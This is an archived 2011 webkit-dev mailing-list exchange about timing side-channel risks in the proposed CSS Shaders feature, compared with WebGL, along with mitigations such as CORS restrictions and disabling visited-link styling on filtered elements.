[webkit-dev] Timing attacks on CSS Shaders (was Re:Security problems with CSS shaders)
Vincent Hardy
vhardy at adobe.com
Wed Dec 7 19:23:18 PST 2011
Hello,
@chris
>> So I take back my statement that CSS Shaders are less dangerous than WebGL. They are more!!!
It seems to me that the differences are:
a. It is easier to do the timing portion of a timing attack in WebGL because it all happens in a script and the timing is precise. With CSS shaders, the timing is pretty coarse.
b. The content that a CSS shader has access to may be more sensitive than the content a WebGL shader has access to because currently, WebGL cannot render HTML (but isn't it possible to render an SVG with a foreignObject containing HTML into a 2D canvas, and then use that as a texture? In that case, wouldn't the risk be the same? Or is the canvas tainted in that case and cannot be used as a texture?).
@charles
>> Can this proposal be moved forward on CORS + HTMLMediaElement, HTMLImageElement and HTMLCanvasElement?
At the last FX meeting, I got an action to sync. up with the CORS group and discuss how CORS would apply to CSS shaders.
Cheers,
Vincent
Date: Mon, 05 Dec 2011 15:59:14 -0800
From: Charles Pritchard <chuck at jumis.com<mailto:chuck at jumis.com>>
To: Chris Marrin <cmarrin at apple.com<mailto:cmarrin at apple.com>>
Cc: Jonas Sicking <jonas at sicking.cc<mailto:jonas at sicking.cc>>, webkit-dev at lists.webkit.org<mailto:webkit-dev at lists.webkit.org>
Subject: Re: [webkit-dev] Timing attacks on CSS Shaders (was Re:
Security problems with CSS shaders)
Message-ID: <4EDD5AD2.4010901 at jumis.com<mailto:4EDD5AD2.4010901 at jumis.com>>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
On 12/5/11 3:34 PM, Chris Marrin wrote:
On Dec 5, 2011, at 11:32 AM, Adam Barth wrote:
On Mon, Dec 5, 2011 at 10:53 AM, Chris Marrin<cmarrin at apple.com<mailto:cmarrin at apple.com>> wrote:
To be clear, it's not the difference between white and black pixels, it's
the difference between pixels with transparency and those without.
Can you explain why the attack is limited to distinguishing between
black and transparent pixels? My understanding is that these attacks
are capable of distinguishing arbitrary pixel values.
This is my misunderstanding. I was referring to the attacks using WebGL, which measure the difference between rendering alpha and non-alpha pixels. But I think there is another, more dangerous attack vector specific to CSS shaders. Shaders have the source image (the image of that part of the page) available. So it is an easy thing to make a certain color pixel take a lot longer to render (your "1000x slower" case). So you can easily and quickly detect, for instance, the color of a link.
Can this proposal be moved forward on CORS + HTMLMediaElement,
HTMLImageElement and HTMLCanvasElement?
The proposal would really benefit users and authors on those media
types, even if it falls short of applying to general HTML elements and
CSS urls in the first draft.
I realize that it falls short of the lofty goals of the presentation,
but it would make a good impact and set the stage for further work. It
seems entirely do-able to disable a:visited on elements that have custom
filters applied, but, like the timing issues, there needs to be some
empirical data on risks before moving forward on them.
So I take back my statement that CSS Shaders are less dangerous than WebGL. They are more!!! As I've said many times (with many more expletives), I hate the Internet.
I think the solution is clear. We should create a whole new internet where we only let in people we trust. :-)
-----
~Chris
cmarrin at apple.com<mailto:cmarrin at apple.com>
I still love my iPhone. ;-)
-Charles
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webkit.org/pipermail/webkit-dev/attachments/20111207/16d789c5/attachment.html>
More information about the webkit-dev
mailing list